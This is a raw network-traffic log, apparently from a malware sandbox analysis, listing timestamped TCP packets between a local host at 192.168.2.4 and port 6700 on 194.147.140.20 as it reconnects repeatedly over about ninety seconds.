Sep 14, 2021 16:49:21.254622936 CEST	6700	49844	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:21.254791975 CEST	49844	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:21.256215096 CEST	49844	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:21.459564924 CEST	6700	49844	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:21.460196018 CEST	49844	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:21.651385069 CEST	6700	49844	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:21.660783052 CEST	49844	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:21.899966955 CEST	6700	49844	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:21.900105000 CEST	49844	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:22.027709007 CEST	6700	49844	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:22.086280107 CEST	49844	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:22.091633081 CEST	6700	49844	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:22.091742039 CEST	49844	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:22.278558016 CEST	6700	49844	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:22.320674896 CEST	49844	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:22.337622881 CEST	6700	49844	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:22.337760925 CEST	49844	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:22.529901981 CEST	6700	49844	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:22.570749998 CEST	49844	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:22.762137890 CEST	6700	49844	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:22.805363894 CEST	49844	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:22.868891954 CEST	49844	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:22.996568918 CEST	6700	49844	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:23.039509058 CEST	49844	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:23.119101048 CEST	6700	49844	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:23.868170977 CEST	49844	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:28.092096090 CEST	49845	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:28.283236980 CEST	6700	49845	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:28.283363104 CEST	49845	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:28.284147978 CEST	49845	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:28.489515066 CEST	6700	49845	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:28.490272999 CEST	49845	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:28.682197094 CEST	6700	49845	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:28.687311888 CEST	49845	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:28.946907997 CEST	6700	49845	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:28.947160959 CEST	49845	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:29.074569941 CEST	6700	49845	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:29.118257999 CEST	49845	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:29.138066053 CEST	6700	49845	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:29.150749922 CEST	49845	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:29.310657024 CEST	6700	49845	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:29.352665901 CEST	49845	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:29.401724100 CEST	6700	49845	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:29.401808977 CEST	49845	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:29.594837904 CEST	6700	49845	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:29.649430990 CEST	49845	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:29.857815981 CEST	6700	49845	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:29.899431944 CEST	49845	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:29.960454941 CEST	49845	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:30.212572098 CEST	6700	49845	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:30.978076935 CEST	49845	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:31.042898893 CEST	6700	49845	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:31.042994022 CEST	49845	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:35.290996075 CEST	49846	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:35.482043028 CEST	6700	49846	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:35.482168913 CEST	49846	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:35.488251925 CEST	49846	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:35.695036888 CEST	6700	49846	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:35.695554018 CEST	49846	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:35.887010098 CEST	6700	49846	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:35.892162085 CEST	49846	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:36.145293951 CEST	6700	49846	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:36.145487070 CEST	49846	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:36.247035980 CEST	6700	49846	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:36.290684938 CEST	49846	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:36.336395025 CEST	6700	49846	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:36.336627007 CEST	49846	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:36.481607914 CEST	6700	49846	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:36.525046110 CEST	49846	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:36.582647085 CEST	6700	49846	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:36.582741022 CEST	49846	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:36.774678946 CEST	6700	49846	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:36.823246956 CEST	49846	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:37.014087915 CEST	6700	49846	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:37.056282043 CEST	49846	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:37.173397064 CEST	49846	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:37.410661936 CEST	6700	49846	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:38.074112892 CEST	49846	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:42.273901939 CEST	49847	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:42.465724945 CEST	6700	49847	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:42.465953112 CEST	49847	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:42.466756105 CEST	49847	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:42.672538996 CEST	6700	49847	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:42.672823906 CEST	49847	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:42.864573956 CEST	6700	49847	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:42.865926981 CEST	49847	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:43.129853010 CEST	6700	49847	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:43.166997910 CEST	49847	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:43.241770029 CEST	6700	49847	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:43.291157961 CEST	49847	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:43.358067036 CEST	6700	49847	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:43.358200073 CEST	49847	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:43.613941908 CEST	6700	49847	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:43.614059925 CEST	49847	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:43.805408955 CEST	6700	49847	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:43.853766918 CEST	49847	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:43.909512997 CEST	49847	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:44.044795036 CEST	6700	49847	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:44.088325977 CEST	49847	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:44.160790920 CEST	6700	49847	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:44.181288004 CEST	49847	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:44.426969051 CEST	6700	49847	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:45.167702913 CEST	49847	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:49.253464937 CEST	49848	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:49.444614887 CEST	6700	49848	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:49.444739103 CEST	49848	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:49.445931911 CEST	49848	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:49.653352022 CEST	6700	49848	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:49.653754950 CEST	49848	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:49.845134974 CEST	6700	49848	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:49.846761942 CEST	49848	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:50.098510981 CEST	6700	49848	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:50.194614887 CEST	6700	49848	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:50.196840048 CEST	49848	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:50.387893915 CEST	6700	49848	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:50.388180971 CEST	49848	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:50.645168066 CEST	6700	49848	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:50.645329952 CEST	49848	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:50.836555958 CEST	6700	49848	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:50.885659933 CEST	49848	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:51.078282118 CEST	6700	49848	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:51.135998964 CEST	49848	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:51.199703932 CEST	49848	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:55.378362894 CEST	49849	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:55.569843054 CEST	6700	49849	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:55.570100069 CEST	49849	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:55.571033955 CEST	49849	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:55.784216881 CEST	6700	49849	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:55.784698009 CEST	49849	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:55.976041079 CEST	6700	49849	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:56.020170927 CEST	49849	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:56.265398979 CEST	6700	49849	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:56.265499115 CEST	49849	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:56.393147945 CEST	6700	49849	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:56.448791027 CEST	49849	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:56.456875086 CEST	6700	49849	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:56.459572077 CEST	49849	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:56.640042067 CEST	6700	49849	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:56.698620081 CEST	49849	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:56.702681065 CEST	6700	49849	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:56.702838898 CEST	49849	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:56.895184994 CEST	6700	49849	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:56.895450115 CEST	49849	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:57.086359024 CEST	6700	49849	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:57.136439085 CEST	49849	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:57.200539112 CEST	49849	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:49:57.447915077 CEST	6700	49849	194.147.140.20	192.168.2.4
Sep 14, 2021 16:49:58.215267897 CEST	49849	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:02.443536043 CEST	49850	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:02.634465933 CEST	6700	49850	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:02.634787083 CEST	49850	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:02.635837078 CEST	49850	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:02.839509010 CEST	6700	49850	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:02.859942913 CEST	49850	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:03.052634954 CEST	6700	49850	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:03.055344105 CEST	49850	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:03.307337999 CEST	6700	49850	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:03.446032047 CEST	6700	49850	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:03.496094942 CEST	49850	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:03.634133101 CEST	49850	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:03.690179110 CEST	6700	49850	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:03.690519094 CEST	49850	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:03.880841017 CEST	6700	49850	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:03.880968094 CEST	49850	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:03.943278074 CEST	6700	49850	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:04.072448969 CEST	6700	49850	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:04.121161938 CEST	49850	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:04.313240051 CEST	6700	49850	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:04.355555058 CEST	49850	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:04.481544971 CEST	49850	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:08.817970991 CEST	49851	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:09.008852959 CEST	6700	49851	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:09.009033918 CEST	49851	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:09.010240078 CEST	49851	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:09.213588953 CEST	6700	49851	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:09.227375984 CEST	49851	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:09.418566942 CEST	6700	49851	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:09.423926115 CEST	49851	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:09.677659035 CEST	6700	49851	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:09.677907944 CEST	49851	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:09.806507111 CEST	6700	49851	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:09.856087923 CEST	49851	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:09.868849993 CEST	6700	49851	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:09.869174957 CEST	49851	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:10.047265053 CEST	6700	49851	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:10.090369940 CEST	49851	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:10.115092039 CEST	6700	49851	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:10.115329981 CEST	49851	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:10.307176113 CEST	6700	49851	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:10.356188059 CEST	49851	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:10.450736046 CEST	49851	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:10.547594070 CEST	6700	49851	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:10.590495110 CEST	49851	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:10.693869114 CEST	6700	49851	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:11.466274977 CEST	49851	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:11.634612083 CEST	6700	49851	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:11.634793997 CEST	49851	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:15.680871010 CEST	49852	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:15.871834040 CEST	6700	49852	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:15.872057915 CEST	49852	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:15.873224020 CEST	49852	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:16.085777998 CEST	6700	49852	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:16.099865913 CEST	49852	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:16.291924953 CEST	6700	49852	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:16.340955019 CEST	49852	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:16.619987965 CEST	49852	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:16.878354073 CEST	6700	49852	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:16.878551960 CEST	49852	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:16.997581005 CEST	6700	49852	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:17.044162989 CEST	49852	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:17.069169998 CEST	6700	49852	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:17.069355011 CEST	49852	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:17.236435890 CEST	6700	49852	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:17.278594971 CEST	49852	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:17.328825951 CEST	6700	49852	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:17.329016924 CEST	49852	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:17.520581961 CEST	6700	49852	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:17.575428963 CEST	49852	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:17.767075062 CEST	6700	49852	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:17.809798956 CEST	49852	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:18.353408098 CEST	49852	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:18.610433102 CEST	6700	49852	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:18.610640049 CEST	49852	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:18.863398075 CEST	6700	49852	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:19.404728889 CEST	49852	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:23.582602978 CEST	49853	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:23.773715973 CEST	6700	49853	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:23.774008036 CEST	49853	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:23.774825096 CEST	49853	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:23.978673935 CEST	6700	49853	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:23.979211092 CEST	49853	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:24.170802116 CEST	6700	49853	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:24.179177999 CEST	49853	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:24.422844887 CEST	6700	49853	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:24.506138086 CEST	49853	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:24.636436939 CEST	6700	49853	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:24.686129093 CEST	49853	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:24.697654963 CEST	6700	49853	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:24.697873116 CEST	49853	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:24.953857899 CEST	6700	49853	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:24.953953028 CEST	49853	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:25.144922018 CEST	6700	49853	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:25.185436964 CEST	49853	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:25.376310110 CEST	6700	49853	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:25.419822931 CEST	49853	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:25.452353001 CEST	49853	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:25.703694105 CEST	6700	49853	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:26.467286110 CEST	49853	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:30.556431055 CEST	49854	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:30.747427940 CEST	6700	49854	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:30.747626066 CEST	49854	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:30.768698931 CEST	49854	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:31.026947975 CEST	6700	49854	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:31.098968983 CEST	6700	49854	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:31.099649906 CEST	49854	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:31.291033030 CEST	6700	49854	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:31.294195890 CEST	49854	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:31.542757034 CEST	6700	49854	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:31.543006897 CEST	49854	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:31.639208078 CEST	6700	49854	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:31.685924053 CEST	49854	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:31.733882904 CEST	6700	49854	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:31.734014988 CEST	49854	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:31.876941919 CEST	6700	49854	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:31.920305014 CEST	49854	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:32.136363029 CEST	6700	49854	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:32.136465073 CEST	49854	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:32.327824116 CEST	6700	49854	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:32.373620987 CEST	49854	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:32.480087042 CEST	49854	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:32.564565897 CEST	6700	49854	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:32.607996941 CEST	49854	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:32.730520010 CEST	6700	49854	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:33.467920065 CEST	49854	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:37.539071083 CEST	49855	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:37.730112076 CEST	6700	49855	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:37.730211973 CEST	49855	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:37.731235027 CEST	49855	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:37.935132980 CEST	6700	49855	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:37.935631990 CEST	49855	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:38.126847029 CEST	6700	49855	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:38.129415989 CEST	49855	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:38.377937078 CEST	6700	49855	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:38.468832016 CEST	49855	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:38.472171068 CEST	6700	49855	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:38.514791012 CEST	49855	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:38.659671068 CEST	6700	49855	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:38.659861088 CEST	49855	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:38.905790091 CEST	6700	49855	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:38.905890942 CEST	49855	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:39.096909046 CEST	6700	49855	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:39.139714003 CEST	49855	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:39.330672026 CEST	6700	49855	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:39.374202967 CEST	49855	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:39.469181061 CEST	49855	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:39.717493057 CEST	6700	49855	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:40.454375982 CEST	49855	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:44.621696949 CEST	49856	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:44.815002918 CEST	6700	49856	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:44.815151930 CEST	49856	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:44.816203117 CEST	49856	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:45.022366047 CEST	6700	49856	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:45.023299932 CEST	49856	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:45.216964006 CEST	6700	49856	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:45.219654083 CEST	49856	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:45.467477083 CEST	6700	49856	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:45.485842943 CEST	49856	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:45.595402956 CEST	6700	49856	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:45.640476942 CEST	49856	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:45.676985025 CEST	6700	49856	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:45.677280903 CEST	49856	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:45.831562996 CEST	6700	49856	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:45.874622107 CEST	49856	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:45.923086882 CEST	6700	49856	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:45.923188925 CEST	49856	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:46.114254951 CEST	6700	49856	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:46.156070948 CEST	49856	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:46.347110987 CEST	6700	49856	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:46.390363932 CEST	49856	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:46.456720114 CEST	49856	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:46.702704906 CEST	6700	49856	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:47.454421997 CEST	49856	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:51.539150953 CEST	49857	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:51.731029987 CEST	6700	49857	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:51.731153011 CEST	49857	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:51.732064009 CEST	49857	6700	192.168.2.4	194.147.140.20
